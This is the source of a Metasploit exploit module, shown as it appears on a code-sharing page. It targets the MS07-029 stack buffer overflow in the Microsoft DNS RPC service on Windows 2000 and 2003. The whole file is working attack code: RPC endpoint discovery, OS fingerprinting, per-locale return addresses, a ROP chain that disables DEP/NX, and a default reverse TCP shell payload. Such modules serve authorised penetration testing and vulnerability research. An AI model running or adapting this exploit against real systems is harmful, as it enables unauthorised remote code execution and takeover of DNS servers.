Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::DCERPC
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)',
14
      'Description'    => %q{
15
          This module exploits a stack buffer overflow in the RPC interface
16
        of the Microsoft DNS service. The vulnerability is triggered
17
        when a long zone name parameter is supplied that contains
18
        escaped octal strings. This module is capable of bypassing NX/DEP
19
        protection on Windows 2003 SP1/SP2.
20
      },
21
      'Author'         =>
22
        [
23
          'hdm',     # initial module
24
          'Unknown', # 2 unknown contributors (2003 support)
25
          'bcoles'   # additional target offsets
26
        ],
27
      'License'        => MSF_LICENSE,
28
      'References'     =>
29
        [
30
          ['CVE', '2007-1748'],
31
          ['OSVDB', '34100'],
32
          ['MSB', 'MS07-029']
33
        ],
34
      'Privileged'     => true,
35
      'DefaultOptions' =>
36
        {
37
          'EXITFUNC' => 'thread',
38
          'PAYLOAD' => 'windows/shell/reverse_tcp'
39
        },
40
      'Payload'        =>
41
        {
42
          'Space'    => 500,
43

44
          # The payload doesn't matter, but make_nops() uses these too
45
          'BadChars' => "\x00",
46

47
          'StackAdjustment' => -3500,
48

49
        },
50
      'Platform'       => 'win',
51
      'Targets'        =>
52
        [
53
          [ 'Automatic (2000 SP0-SP4, 2003 SP0-SP2)', { } ],
54

55
          # p/p/r WS2HELP.DLL
56
          [ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
57
          [ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
58
          [ 'Windows 2000 Server SP0-SP4+ German', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
59
          [ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
60
          [ 'Windows 2000 Server SP0-SP4+ Polish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
61
          [ 'Windows 2000 Server SP0-SP4+ Portuguese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
62
          [ 'Windows 2000 Server SP0-SP4+ Korean', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
63
          [ 'Windows 2000 Server SP0-SP4+ Russian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
64
          [ 'Windows 2000 Server SP0-SP4+ Simplified Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
65
          [ 'Windows 2000 Server SP0-SP4+ Spanish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
66
          [ 'Windows 2000 Server SP0-SP4+ Swedish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
67
          [ 'Windows 2000 Server SP0-SP4+ Traditional Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
68
          [ 'Windows 2000 Server SP0-SP4+ Turkish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fc2ac4 } ],
69

70
          # Use the __except_handler3 method (and jmp esp in ATL.dll)
71
          [ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
72
          [ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ],
73

74
          # ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll)
75
          [ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ],
76
          [ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
77
          [ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
78
          [ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
79
          [ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
80
          [ 'Windows 2003 Server SP1-SP2 Russian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769a0000 } ],
81
          [ 'Windows 2003 Server SP1-SP2 Simplified Chinese', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769c0000 } ],
82
        ],
83
      'DisclosureDate' => '2007-04-12',
84
      'DefaultTarget'  => 0 ))
85

86
    register_options(
87
      [
88
        Opt::RPORT(0),
89
        OptString.new('Locale', [ true,  "Locale for automatic target (English, French, Italian, ...)", 'English'])
90
      ])
91
  end
92

93

94
  def gettarget(os)
95

96
    targets.each do |target|
97
      if ((target['OS'] =~ /#{os}/) && (target.name =~ /#{datastore['Locale']}/))
98
        return target
99
      end
100
    end
101

102
    return nil
103
  end
104

105

106
  def exploit
107

108

109
    # Ask the endpoint mapper to locate the port for us
110
    dport = datastore['RPORT'].to_i
111

112
    if ((dport != 0) && (target.name =~ /Automatic/))
113
      print_error("Unable to use automatic targeting when RPORT is given");
114
      return
115
    end
116

117
    if (dport == 0)
118

119
      dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp')
120

121
      if (not dport)
122
        print_error("Could not determine the RPC port used by the Microsoft DNS Server")
123
        return
124
      end
125

126
      print_status("Discovered Microsoft DNS Server RPC service on port #{dport}")
127
    end
128

129

130
    mytarget = nil
131

132
    if (target.name =~ /Automatic/)
133

134
      # scheduler service is only available on 2k3 SP0 and 2000
135
      schedport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '1ff70682-0a51-30e8-076d-740be8cee98b', '1.0', 'ncacn_ip_tcp')
136

137
      if (not schedport)
138
        print_status("Detected a Windows 2003 SP1-SP2 target...")
139
        mytarget = gettarget('2003SP12')
140
      else
141
        # only available on 2003 SP0
142
        schedport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53', '1.0', 'ncacn_ip_tcp')
143

144
        if (not schedport)
145
          print_status("Detected a Windows 2000 SP0-SP4 target...")
146
          mytarget = gettarget('2000')
147
        else
148
          print_status("Detected a Windows 2003 SP0 target...")
149
          mytarget = gettarget('2003SP0')
150
        end
151
      end
152

153
      if (not mytarget)
154
        fail_with(Failure::NoTarget, "There is no available target for '#{datastore['LOCALE']}' locale")
155
      end
156
    else
157
      mytarget = target
158
    end
159

160

161

162
    # Connect to the high RPC port
163
    connect(true, { 'RPORT' => dport })
164
    print_status("Trying target #{mytarget.name}...")
165

166
    # Bind to the service
167
    handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']])
168
    print_status("Binding to #{handle} ...")
169
    dcerpc_bind(handle)
170
    print_status("Bound to #{handle} ...")
171

172
    # Create our buffer with our shellcode first
173
    txt = Rex::Text.rand_text_alphanumeric(8192)
174

175
    if (mytarget['OS'] =~ /2000/)
176
      txt[0, payload.encoded.length] = payload.encoded
177

178
      off = mytarget['Off']
179
      txt[ off ] = [mytarget.ret].pack('V')
180
      txt[ off - 4, 2] = "\xeb\x06"
181
      txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
182

183
    elsif (mytarget['OS'] =~ /2003SP0/)
184
      txt[0, payload.encoded.length] = payload.encoded
185

186
      off = mytarget['Off']
187
      txt[ off ] = [mytarget['Rets'][0]].pack('V')  # __except_handler3
188
      txt[ off - 4, 2] = "\xeb\x16"
189

190
      # addr = A + B*12 + 4 = 0x77f7e7f0  (ntdll -> 0x77f443c9)
191
      addr  = mytarget['Rets'][1] - 4
192
      addr1 = addr / 2
193
      addr2 = addr1 + addr % 2
194
      addr1 = addr1 + (addr2 % 12)
195
      addr2 = addr2 / 12
196

197
      txt[ off + 4, 8] = [addr1, addr2].pack('VV') # A,B
198

199
      #
200
      # then mov eax, [addr] sets eax to 0x77f443c9 and the code goes here :
201
      #
202
      # 0x77f443c9 jmp off_77f7e810[edx*4]   ;  edx = 0 so jmp to 77f443d0
203
      # 0x77f443d0 mov eax, [ebp+arg_0]
204
      # 0x77f443d3 pop esi
205
      # 0x77f443d4 pop edi
206
      # 0x77f443d5 leave    ; mov esp, ebp
207
      # 0x77f443d6 retn     ; ret
208

209
      txt[ off + 16, 4] = [mytarget['Rets'][2]].pack('V')  # jmp esp
210
      txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V')
211

212
    elsif (mytarget['OS'] =~ /2003SP12/)
213
      off = mytarget['Off']
214
      ib  = mytarget['IB']
215
      txt[ off ] = [ib + 0x2566].pack('V')
216

217

218
      # to bypass NX we need to emulate the call to ZwSetInformationProcess
219
      # with generic value (to work on SP1-SP2 + patches)
220

221
      off = 445
222

223
      # first we set esi to 0xed by getting the value on the stack
224
      #
225
      # 0x76a81da7:
226
      # pop esi   <- esi = edh
227
      # retn
228

229
      txt[ off + 4, 4 ] = [ib + 0x1da7].pack('V')
230
      txt[ off + 28, 4] = [0xed].pack('V')
231

232
      # now we set ecx to 0x7ffe0300, eax to 0xed
233
      # 0x76a81da4:
234
      # pop ecx    <-  ecx = 0x7ffe0300
235
      # mov eax, esi   <- eax == edh
236
      # pop esi
237
      # retn
238

239
      txt[ off + 32, 4] = [ib + 0x1da4].pack('V')
240
      txt[ off + 36, 4] = [0x7ffe0300].pack('V')
241

242
      # finally we call NtSetInformationProcess (-1, 34, 0x7ffe0270, 4)
243
      # 0x7FFE0270 is a pointer to 0x2 (os version info :-) to disable NX
244
      # 0x76a8109c:
245
      # call dword ptr [ecx]
246

247
      txt[ off + 44, 4] = [ib + 0x109c].pack('V')  # call dword ptr[ecx]
248
      txt[ off + 52, 16] = [-1, 34, 0x7FFE0270, 4].pack('VVVV')
249

250
      # we catch the second exception to go back to our shellcode, now that
251
      # NX is disabled
252

253
      off = 1013
254
      txt[ off, 4 ] = [ib + 0x135bf].pack('V')   # (jmp esp in atl.dll)
255
      txt[ off + 24, payload.encoded.length ] = payload.encoded
256

257
    end
258

259
    req = ''
260

261
    # Convert the string to escaped octal
262
    txt.unpack('C*').each do |c|
263
      req << "\\"
264
      req << c.to_s(8)
265
    end
266

267
    # Build the RPC stub data
268
    stubdata =
269
      NDR.long(rand(0xffffffff)) +
270
      NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") +
271

272
      NDR.long(rand(0xffffffff)) +
273
      NDR.string(req + "\x00") +
274

275
      NDR.long(rand(0xffffffff)) +
276
      NDR.string(Rex::Text.rand_text_alpha(1) + "\x00")
277

278
    print_status('Sending exploit...')
279

280
    begin
281
      response = dcerpc.call(1, stubdata)
282

283
      if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
284
        print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
285
      end
286
    rescue ::Exception => e
287
      print_error("Error: #{e}")
288
    end
289

290
    handler
291
    disconnect
292
  end
293
end
294

295